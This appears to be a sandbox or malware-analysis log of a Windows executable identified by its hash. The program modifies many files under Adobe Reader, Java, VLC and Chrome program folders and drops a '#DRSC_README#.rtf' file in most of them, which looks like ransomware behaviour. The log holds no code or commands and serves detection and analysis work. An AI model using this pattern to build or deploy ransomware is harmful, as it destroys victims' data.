710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCallbacks.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\bun.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\tool-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Microsoft.VCLibs.x86.14.00.appx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N1.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\localedata.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaSansRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-down.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fontconfig.properties.src 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\duplicate.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_fw.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-disabled.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RDCNotificationClient.appx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\ktab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-progress.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\jaccess.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\InstallSkip.aifc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ko_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluError_136x136.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\dot.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_TW.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\fake_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\flavormap.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jvm.hprof.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-72x72-precomposed.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nl.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_CopyDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\US_export_policy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\jfluid-server-15.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\nacl_irt_x86_64.nexe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Toast.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaTypewriterBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\sfs_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js 